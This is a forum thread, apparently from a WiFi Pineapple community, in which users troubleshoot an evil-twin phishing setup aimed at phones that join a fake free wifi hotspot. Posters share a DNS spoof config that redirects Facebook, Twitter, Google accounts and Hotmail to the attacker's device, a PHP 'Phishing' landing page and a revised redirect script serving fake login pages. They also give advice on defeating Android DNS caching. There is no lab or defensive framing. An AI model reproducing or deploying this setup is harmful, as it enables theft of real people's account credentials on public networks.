Dns Spoof

[Hackzilla]

Hi All!

I configurated all the redirection sites on my /www folder, but i have a question, if a cellphone connect to my pineapple thinking that is a open free wifi spot, the dns spoof should work anyway? because i connect to the pineapple wifi network with my android and when i try to access to facebook, it goes to the original facebook page (the facebook is an example, I try with another webs), this is so extrange because when the karma is working in a laptop the dns spoof work correctly :S

Thanks for the help!

[Neworld]

This could be due to the fact that your cellphone doesn't actually go to *facebook.com .... usually they are transferred to a mobile version of facebook.com

you might want to try...

172.16.42.1 *facebook.com
172.16.42.1 *m.facebook.com

[/CODE]

or whatever the url is for phones

mine happens to be http://m.facebook.com/

see if that does the trick :D

Edited July 25, 2012 by Neworld

[Hackzilla]

This could be due to the fact that your cellphone doesn't actually go to *facebook.com .... usually they are transferred to a mobile version of facebook.com

you might want to try...

172.16.42.1 *facebook.com
172.16.42.1 *m.facebook.com

[/CODE]

or whatever the url is for phones

mine happens to be http://m.facebook.com/

see if that does the trick :D

Thanks for the help, yes i try that before, here you have my configuration:

DNS Spoof Config:

172.16.42.1 *m.facebook.com

172.16.42.1 *facebook.com

172.16.42.1 *twitter.com

172.16.42.1 *accounts.google.com

172.16.42.1 *hotmail.com

Landing Page (Phishing)

<?php

$ref = $_SERVER['HTTP_HOST'];

if (strpos($ref, 'facebook.com') !== FALSE){ include('facebook.html') ;}

if (strpos($ref, 'twitter.com') !== FALSE){ include('twitter.html') ;}

if (strpos($ref, 'accounts.google.com') !== FALSE){ include('gmail.html') ;}

exit;

require('error.php');

?>

but still doing the redirection to the original facebook page, and i don't see the error in the configuration, is strange..

[Neworld]

Thanks for the help, yes i try that before, here you have my configuration:

DNS Spoof Config:

172.16.42.1 *m.facebook.com

172.16.42.1 *facebook.com

172.16.42.1 *twitter.com

172.16.42.1 *accounts.google.com

172.16.42.1 *hotmail.com

Landing Page (Phishing)

<?php

$ref = $_SERVER['HTTP_HOST'];

if (strpos($ref, 'facebook.com') !== FALSE){ include('facebook.html') ;}

if (strpos($ref, 'twitter.com') !== FALSE){ include('twitter.html') ;}

if (strpos($ref, 'accounts.google.com') !== FALSE){ include('gmail.html') ;}

exit;

require('error.php');

?>

but still doing the redirection to the original facebook page, and i don't see the error in the configuration, is strange..

You might want to try changing the redirect.php then.... I was having problems with it before.

Try this but don't delete your old one in case it doesn't work. Just rename your redirect.php to redirect1.php so you don't lose it....

Make a new redirect.php and put this in it....

<?php
$ref = "http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];

if (strpos($ref, "facebook")) { header('Location: facebook.html'); }
if (strpos($ref, "twitter")) { header('Location: twitter.html'); }
if (strpos($ref, "accounts.google.com")) { header('Location: gmail.html'); }
?>
[/CODE]

I changed the

[CODE]
$ref = $_SERVER['HTTP_HOST'];
[/CODE]

to

[CODE]
$ref = "http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];
[/CODE]

and deleted the "require('error.php')" for testing purposes...

[PineDominator]

its most likely because your android is caching the dns lookup prior to the dnsspoof, I clear mine with 1 tap cleaner

also unplugging/stopping ICS will force android to be dns spoofed, it sucks because not all or everyone will be redirected for every site.

Edited July 25, 2012 by petertfm

[Hackzilla]

its most likely because your android is caching the dns lookup prior to the dnsspoof, I clear mine with 1 tap cleaner

also unplugging/stopping ICS will force android to be dns spoofed, it sucks because not all or everyone will be redirected for every site.

But there is no way to fix it?